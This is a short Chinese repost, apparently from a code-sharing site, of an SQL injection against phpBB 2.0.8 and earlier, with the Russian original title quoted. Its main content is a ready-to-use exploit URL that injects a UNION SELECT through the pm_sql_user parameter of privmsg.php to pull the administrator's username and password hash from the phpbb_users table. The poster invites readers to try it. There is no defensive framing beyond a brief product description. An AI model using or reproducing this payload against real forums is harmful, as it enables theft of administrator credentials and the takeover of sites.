📄 phpbb 小于等于2.0.8 sql injection.txt
字号:
原文标题是:SQL-инъекция в PhpBB <=2.0.8 中间是俄文,看不懂,但估计是SQL Injection,谁方便的可测试下。PhpBB 是款免费的PHP论坛,支持多种数据库,国内有一定的用户群。
代码:
site.com/phpBB/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20username,null,user_password,null,null,null,null,null,
null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,
null,null,null%20FROM%20phpbb_users%20WHERE%20user_level=1%20LIMIT%201/*
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -